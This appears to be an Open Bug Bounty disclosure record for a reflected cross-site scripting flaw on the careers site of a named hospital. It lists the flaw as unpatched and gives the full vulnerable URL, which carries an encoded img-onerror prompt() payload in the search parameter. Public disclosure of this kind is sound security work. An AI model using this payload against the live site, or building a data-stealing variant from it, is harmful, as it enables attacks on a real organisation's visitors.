careers.nyp.org XSS vulnerability

2015-08-17T10:47:00
ID OBB:79725
Type openbugbounty
Reporter bugs3ra
Modified 2015-08-17T10:49:00

Description

Vulnerable URL:
http://careers.nyp.org/job-search.html?action=search&q;=%27%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSSPOSED%2F%29%3E&specialty;=&nyp;_location=&job;_id=&job;_status=&job;_shift=&sorted;_by=&x;=119&y;=14#jobsearchresults
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 25.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 5
VIP website status:| No
Check careers.nyp.org SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 17 August, 2015 10:47 GMT
Vulnerability existence verified and confirmed| 17 August, 2015 10:49 GMT